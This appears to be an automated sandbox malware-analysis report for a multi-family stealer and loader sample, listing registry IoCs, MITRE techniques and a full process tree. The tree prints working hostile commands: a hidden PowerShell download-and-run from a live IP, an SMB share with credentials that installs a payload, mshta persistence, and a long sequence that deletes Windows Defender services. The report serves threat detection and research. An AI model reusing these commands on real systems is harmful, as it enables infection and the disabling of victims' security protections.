Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rapes.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3280	schtasks.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4348	powershell.exe
4348	powershell.exe
2968	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
2968	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
1204	rapes.exe
1204	rapes.exe
2576	powershell.exe
2576	powershell.exe
3784	powershell.exe
3784	powershell.exe
3784	powershell.exe
3184	powershell.exe
3184	powershell.exe
3184	powershell.exe
536	powershell.exe
536	powershell.exe
536	powershell.exe
1180	powershell.exe
1180	powershell.exe
1180	powershell.exe
1100	rapes.exe
1100	rapes.exe
1384	rapes.exe
1384	rapes.exe
4500	eb1cfbb5e5.exe
4500	eb1cfbb5e5.exe
5096	powershell.exe
5096	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	1392	7q8Wm5h.exe
Token: SeDebugPrivilege	5096	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4416 wrote to memory of 2676	4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 4416 wrote to memory of 2676	4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 4416 wrote to memory of 2676	4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 4416 wrote to memory of 3232	4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 4416 wrote to memory of 3232	4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 4416 wrote to memory of 3232	4416	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 2676 wrote to memory of 3280	2676	cmd.exe	89
PID 2676 wrote to memory of 3280	2676	cmd.exe	89
PID 2676 wrote to memory of 3280	2676	cmd.exe	89
PID 3232 wrote to memory of 4348	3232	mshta.exe	92
PID 3232 wrote to memory of 4348	3232	mshta.exe	92
PID 3232 wrote to memory of 4348	3232	mshta.exe	92
PID 4348 wrote to memory of 2968	4348	powershell.exe	102
PID 4348 wrote to memory of 2968	4348	powershell.exe	102
PID 4348 wrote to memory of 2968	4348	powershell.exe	102
PID 2968 wrote to memory of 1204	2968	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE	103
PID 2968 wrote to memory of 1204	2968	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE	103
PID 2968 wrote to memory of 1204	2968	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE	103
PID 1204 wrote to memory of 1668	1204	rapes.exe	105
PID 1204 wrote to memory of 1668	1204	rapes.exe	105
PID 1204 wrote to memory of 1668	1204	rapes.exe	105
PID 1668 wrote to memory of 2576	1668	cmd.exe	107
PID 1668 wrote to memory of 2576	1668	cmd.exe	107
PID 1668 wrote to memory of 2576	1668	cmd.exe	107
PID 2576 wrote to memory of 1992	2576	powershell.exe	108
PID 2576 wrote to memory of 1992	2576	powershell.exe	108
PID 2576 wrote to memory of 1992	2576	powershell.exe	108
PID 1992 wrote to memory of 4228	1992	cmd.exe	110
PID 1992 wrote to memory of 4228	1992	cmd.exe	110
PID 1992 wrote to memory of 4228	1992	cmd.exe	110
PID 1204 wrote to memory of 2068	1204	rapes.exe	115
PID 1204 wrote to memory of 2068	1204	rapes.exe	115
PID 1204 wrote to memory of 2068	1204	rapes.exe	115
PID 2068 wrote to memory of 512	2068	apple.exe	116
PID 2068 wrote to memory of 512	2068	apple.exe	116
PID 2068 wrote to memory of 512	2068	apple.exe	116
PID 512 wrote to memory of 2100	512	262.exe	118
PID 512 wrote to memory of 2100	512	262.exe	118
PID 2100 wrote to memory of 4140	2100	cmd.exe	120
PID 2100 wrote to memory of 4140	2100	cmd.exe	120
PID 2100 wrote to memory of 4140	2100	cmd.exe	120
PID 4140 wrote to memory of 4400	4140	262.exe	121
PID 4140 wrote to memory of 4400	4140	262.exe	121
PID 4400 wrote to memory of 3596	4400	cmd.exe	123
PID 4400 wrote to memory of 3596	4400	cmd.exe	123
PID 4400 wrote to memory of 968	4400	cmd.exe	124
PID 4400 wrote to memory of 968	4400	cmd.exe	124
PID 4400 wrote to memory of 3184	4400	cmd.exe	125
PID 4400 wrote to memory of 3184	4400	cmd.exe	125
PID 4400 wrote to memory of 4496	4400	cmd.exe	126
PID 4400 wrote to memory of 4496	4400	cmd.exe	126
PID 4400 wrote to memory of 4864	4400	cmd.exe	127
PID 4400 wrote to memory of 4864	4400	cmd.exe	127
PID 4400 wrote to memory of 4448	4400	cmd.exe	128
PID 4400 wrote to memory of 4448	4400	cmd.exe	128
PID 4400 wrote to memory of 1392	4400	cmd.exe	129
PID 4400 wrote to memory of 1392	4400	cmd.exe	129
PID 4400 wrote to memory of 2916	4400	cmd.exe	130
PID 4400 wrote to memory of 2916	4400	cmd.exe	130
PID 4400 wrote to memory of 1380	4400	cmd.exe	131
PID 4400 wrote to memory of 1380	4400	cmd.exe	131
PID 4400 wrote to memory of 1852	4400	cmd.exe	132
PID 4400 wrote to memory of 1852	4400	cmd.exe	132
PID 4400 wrote to memory of 1156	4400	cmd.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn MdwEmmafDRX /tr "mshta C:\Users\Admin\AppData\Local\Temp\tRNVXGcNc.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn MdwEmmafDRX /tr "mshta C:\Users\Admin\AppData\Local\Temp\tRNVXGcNc.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3280
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\tRNVXGcNc.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4348
  - - C:\Users\Admin\AppData\Local\TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
      "C:\Users\Admin\AppData\Local\TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2968
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1204
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2576
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1992
        
        C:\Windows\SysWOW64\net.exe
        
        net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4228
        
        \??\UNC\aaso12.duckdns.org\shear\s.exe
        
        \\aaso12.duckdns.org\shear\s -fullinstall
        9⤵
        Sets service image path in registry
        Drops file in Program Files directory
        
        PID:5020
      - C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:512
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DD02.tmp\DD03.tmp\DD14.bat C:\Users\Admin\AppData\Local\Temp\262.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4140
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DDDD.tmp\DDDE.tmp\DDDF.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:4400
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:3596
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:968
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:3184
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4496
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4864
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4448
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1392
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2916
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1380
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:1852
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1156
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1668
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:1460
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:1172
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:4908
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:1384
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:860
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:3668
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:3796
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3348
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3520
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:3260
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4660
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4656
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:1308
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:3760
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:3192
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:2700
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1168
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1068
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:2408
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:1876
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:944
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:4372
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:2948
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3548
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:228
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:2680
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:4980
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:3148
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4492
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4856
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:1208
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:3752
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:2236
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:628
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:5116
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:2536
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:380
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4176
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4532
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:2100
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3596
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5024
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:920
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:1436
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:4864
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:4448
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:1672
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:1380
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:4508
      - C:\Users\Admin\AppData\Local\Temp\10451390101\1687be4552.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10451390101\1687be4552.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10451390101\1687be4552.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4508
      - C:\Users\Admin\AppData\Local\Temp\10451400101\eb1cfbb5e5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10451400101\eb1cfbb5e5.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10451400101\eb1cfbb5e5.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2536
      - C:\Users\Admin\AppData\Local\Temp\10451410101\7q8Wm5h.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10451410101\7q8Wm5h.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1180
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:5068
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:2300
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:400
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:2888

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1100

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAEQALQBtAFAAcABSAEUAZgBFAFIAZQBOAGMARQAgAC0ARQB4AEMATABVAHMASQBvAE4AUABBAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0AZgBPAFIAYwBFADsAIABhAEQARAAtAE0AUABwAFIARQBGAEUAcgBlAG4AYwBlACAALQBlAHgAYwBMAFUAUwBJAG8AbgBwAHIATwBDAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwA